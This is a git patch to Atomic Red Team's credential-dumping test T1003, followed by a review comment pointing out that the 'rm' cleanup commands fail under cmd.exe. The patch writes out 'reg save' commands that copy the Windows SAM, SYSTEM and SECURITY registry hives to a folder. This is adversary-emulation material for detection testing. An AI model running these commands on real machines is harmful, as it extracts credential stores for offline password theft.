From 135c516a080b80c380fcdecdc211c27ea458dcba Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 30 Dec 2019 15:06:51 +0000
Subject: [PATCH] Generate docs from job=validate_atomics_generate_docs branch=master
---
 atomics/T1003/T1003.md | 17 +++++++++++------
 atomics/index.yaml | 17 +++++++++++------
 2 files changed, 22 insertions(+), 12 deletions(-)
diff --git a/atomics/T1003/T1003.md b/atomics/T1003/T1003.md
index 6dd78aea..28f30ecd 100644
--- a/atomics/T1003/T1003.md
+++ b/atomics/T1003/T1003.md
@@ -229,19 +229,24 @@ via three registry keys. Then processed locally using https://github.com/Neohaps
 **Supported Platforms:** Windows
+#### Inputs
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_folder | Output folder path | Path | C:\Windows\Temp|
+
 #### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
 ```
-reg save HKLM\sam sam
-reg save HKLM\system system
-reg save HKLM\security security
+reg save HKLM\sam "#{output_folder}\sam"
+reg save HKLM\system "#{output_folder}\system"
+reg save HKLM\security "#{output_folder}\security"
 ```
 #### Cleanup Commands:
 ```
-rm sam
-rm system
-rm security
+rm "#{output_folder}\sam"
+rm "#{output_folder}\system"
+rm "#{output_folder}\security"
 ```
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 936f6a7f..94299cf0 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -19468,17 +19468,22 @@ credential-access:
 via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7
 supported_platforms:
 - windows
+ input_arguments:
+ output_folder:
+ description: Output folder path
+ type: Path
+ default: C:\Windows\Temp
 executor:
 name: command_prompt
 elevation_required: true
 command: |
-reg save HKLM\sam sam
-reg save HKLM\system system
-reg save HKLM\security security
+reg save HKLM\sam "#{output_folder}\sam"
+reg save HKLM\system "#{output_folder}\system"
+reg save HKLM\security "#{output_folder}\security"
 cleanup_command: |
-rm sam
-rm system
-rm security
+rm "#{output_folder}\sam"
+rm "#{output_folder}\system"
+rm "#{output_folder}\security"
 - name: Dump LSASS.exe Memory using ProcDump
 description: |
 The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals
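Review bot: The rewritten `cleanup_command` lines still call `rm`, which the `command_prompt` executor declared a few lines above (cmd.exe) does not provide unless a Unix toolset happens to be on PATH, so after the test the saved `sam`, `system` and `security` hive files — credential material — stay behind in `#{output_folder}`. The cleanup should use the cmd built-in instead, `del "#{output_folder}\sam"`, and likewise for `system` and `security`; the same `rm` lines appear in the T1003.md hunk. This index looks generated (the commit subject names a CI doc-generation job), so the correction belongs in the source atomic definition the generator reads, not in this hunk. The new `default: C:\Windows\Temp` is fine as a plain scalar, since backslashes are literal in unquoted YAML.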